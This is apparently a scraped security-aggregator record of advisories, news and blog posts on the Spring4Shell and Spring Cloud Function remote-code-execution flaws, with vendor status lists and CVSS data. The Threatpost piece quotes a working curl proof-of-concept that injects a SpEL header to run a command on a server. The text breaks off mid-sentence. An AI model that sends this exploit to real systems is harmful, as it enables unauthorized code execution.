SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- 
\n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-31T16:29:53", "description": "_NOTE: This post is about the confirmed and patched vulnerability tracked as [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). 
While the researchers at Sysdig refer to this Spring Cloud bug as \u201cSpring4Shell,\u201d it should be noted that there is some confusion as to what to call it, with another security firm referring to a different, unconfirmed bug in Spring Core as \u201cSpring4Shell.\u201d To avoid confusion, this post has been amended to take out references to Spring4Shell altogether._\n\nA concerning security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.\n\nSome researchers have noted that because of its ease of exploit and Java-based nature, it\u2019s reminiscent of the [Log4Shell vulnerability](<https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/>) discovered in December.\n\n\u201c[This] is another in a series of major Java vulnerabilities,\u201d Stefano Chierici, a security researcher at Sysdig, noted in materials shared with Threatpost. \u201cIt has a very low bar for exploitation so we should expect to see attackers heavily scanning the internet. Once found, they will likely install cryptominers, [distributed denial-of-service] DDoS agents, or their remote-access toolkits.\u201d\n\nThe bug ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)) affects versions 3.1.6 and 3.2.2, as well as older, unsupported versions, according to a [Tuesday advisory](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) from VMware. 
Users should update to [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) and [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) in order to implement a patch.\n\n## Why Such a Low CVSS Score?\n\nWhile it carries a medium-severity score of 5.4 on the CVSS scale, researchers warned not to underestimate the bug\u2019s impact.\n\n\u201cVMware is using the CVSSv3 base metric \u2018CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L.\u2019 This is underrepresenting the confidentiality, integrity and availability impacts of this vulnerability,\u201d Sysdig researchers Nick Lang and Jason Avery told Threatpost. \u201cThis vulnerability allows an attacker to open a reverse shell in the context of the Spring Cloud service, which may be as root. The impacts are all high and do not require user interaction, which gives this CVE a critical rating.\u201d\n\nThey added, \u201cIn our testing, we verified that user interaction is not required to leverage the CVE-2022-22963 vulnerability to gain unauthorized access.\u201d\n\nSatnam Narang, staff research engineer, Tenable, agrees with the assessment that the CVSS score may not be reflective of the true impact of the issue.\n\n\u201cBecause the vulnerability is considered a remote code execution flaw that can be exploited by an unauthenticated attacker, it appears that the CVSSv3 score might not reflect the actual impact of this flaw,\u201d he said via email.\n\nPaul Ducklin, principal research scientist at Sophos, noted that it alarmingly allows for \u201cinstant RCE.\u201d\n\n\u201cMy recommendation is simple, and doesn\u2019t need a score: Patch against CVE-2022-22963 because it\u2019s attracting lots of interest, and proof-of-concept code is readily available, so why be behind when you could so easily be ahead?\u201d he told Threatpost.\n\n## **Widescale Consequences Set to Sprout**\n\nSpring Cloud is an open-source 
microservices framework: A collection of ready-to-use components which are useful in building distributed applications in an enterprise. It\u2019s [widely used across industries](<https://spring.io/projects/spring-cloud>) by various companies and includes ready-made integration with components from various app providers, including Kubernetes and Netflix.\n\nAs such, its footprint is concerning, according to Sysdig.\n\n\u201cSpring is\u2026used by millions of developers using Spring Framework to create high-performing, easily testable code,\u201d Chierici said. \u201cThe Spring Cloud Function framework allows developers to write cloud-agnostic functions using Spring features. These functions can be stand-alone classes and one can easily deploy them on any cloud platform to build a serverless framework.\u201d\n\nHe added, \u201cSince Spring Cloud Function can be used in Cloud serverless functions like AWS lambda or Google Cloud Functions, those functions might be impacted as well\u2026leading the attackers inside your cloud account.\u201d\n\n## **The CVE-2022-22963 Bug in Bloom**\n\nAccording to Sysdig, the vulnerability can be exploited over HTTP: Just like Log4Shell, it only requires an attacker to send a malicious string to a Java app\u2019s HTTP service.\n\n\u201cUsing routing functionality, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) as a routing-expression to access local resources and execute commands in the host,\u201d Chierici explained. 
\u201cThe issue with CVE-2022-22963 is that it permits using HTTP request header spring.cloud.function.routing-expression parameter and SpEL expression to be injected and executed through StandardEvaluationContext.\u201d\n\nAs such, unfortunately, an exploit is \u201cquite easy to accomplish\u201d using a simple curl command he noted:\n\n_curl -i -s -k -X $\u2019POST\u2019 -H $\u2019Host: 192.168.1.2:8080\u2032 -H $\u2019spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\u201dtouch /tmp/test\u201d)\u2019 \u2013data-binary $\u2019exploit_poc\u2019 $\u2019http://192.168.1.2:8080/functionRouter\u2019_\n\n_<CURL>_\n\nSysdig published a PoC exploit on its GitHub page, and as noted, others are circulating.\n\n\u201cThe PoCs we\u2019ve seen so far have all simply popped up a calculator app, that being more than enough to prove the point, but it looks as though any command already installed on the server could easily be launched,\u201d [noted Ducklin](<https://nakedsecurity.sophos.com/2022/03/30/vmware-spring-cloud-java-bug-gives-instant-remote-code-execution-update-now/>), who refers to the bug as the \u201cSpring Expression Resource Access Vulnerability\u201d or \u201cSPEL Vulnerability.\u201d\n\nHe added, \u201cThis includes remotely triggering web downloader programs such as curl, launching command shells such as bash, or indeed doing both of those in sequence as a way of quietly and quickly implanting malware.\u201d\n\n## **Weeding Out Compromises**\n\nAfter applying the patch, anyone using applications built using Spring Cloud should take a careful inventory of their installations to make sure compromise hasn\u2019t already occurred, according to Sysdig.\n\n\u201cEven though you might have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you need to detect any exploitation attempts and post-breach activities in your environment,\u201d Chierici said.\n\nThat detection can 
be done via image scanners or a runtime detection engine to suss out malicious behaviors in already-deployed hosts or pods, he noted.\n\n\u201cThe best defense for this type of vulnerability is to patch as soon as possible,\u201d according to Sysdig\u2019s writeup. \u201cHaving a clear understanding of the packages being used in your environment is a must in today\u2019s world.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T18:04:11", "type": "threatpost", "title": "RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22693", "CVE-2022-22963"], 
"modified": "2022-03-30T18:04:11", "id": "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "href": "https://threatpost.com/critical-rce-bug-spring-log4shell/179173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nIn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. 
It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in newer JDK versions an alternative method exists for such exploitation, for example, through Java 9 Platform Module System functionality. \nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. SpEL is a special expression language created for Spring Framework that supports queries and object graph management at runtime. This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations against exploitation of the Spring vulnerabilities\n\nCVE-2022-22965 is fixed in Spring Boot 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. 
Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): "Spring4Shell", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. 
It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. 
\n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find "`spring-webmvc-*.jar`", "`spring-webflux*.jar`" or "`spring-boot*.jar`" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. It is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201cclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. 
And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-12-20T00:10:35", "description": "A critical vulnerability can send countless organizations into chaos, as security teams read up on the vulnerability, try to figure out whether it applies to their systems, download any potential patches, and deploy those fixes to affected machines. But a lot can go wrong when a vulnerability is discovered, disclosed, and addressed--an inflated severity rating, a premature disclosure, even a mixup in names.\n\nIn these instances, when the security community is readying itself for a major sea change, what it instead gets is a ripple. Here are some of the last year's biggest miscommunications and errors in security vulnerabilities. \n\n## 1\\. \"Wormable\"\n\nThere are some qualifications for vulnerabilities that send shivers up the spine of the security community as a whole. A "wormable" vulnerability is used when the possibility exists that an infected system can contribute as an active source to infect other systems. This makes the growth potential of an infection exponential. You'll often see the phrase "WannaCry like proportions" used as a warning about how bad it could get.\n\nWhich brings us to our first example: [CVE-2022-34718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34718>), a Windows TCP/IP Remote Code Execution (RCE) vulnerability with a [CVSS rating](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.8. 
The vulnerability could have allowed an unauthenticated attacker to execute code with elevated privileges on affected systems without user interaction, which makes it \"wormable,\" but in the end, it turned out to be not so bad since it only affected systems with IPv6 and IPSec enabled and it was patched before an in-depth analysis of the vulnerability was [publicly disclosed](<https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf>).\n\n## 2\\. Essential building blocks\n\nSomething we've learned the hard way is that there are very popular libraries maintained by volunteers that many other applications rely on. A library is a set of resources that can be shared among processes. Often these resources are specific functions aimed at a certain goal which can be called upon when needed so they do not have to be included in the code of the software. A prime example of such a library that caused quite some havoc was [Log4j](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>).\n\nSo, when [OpenSSL 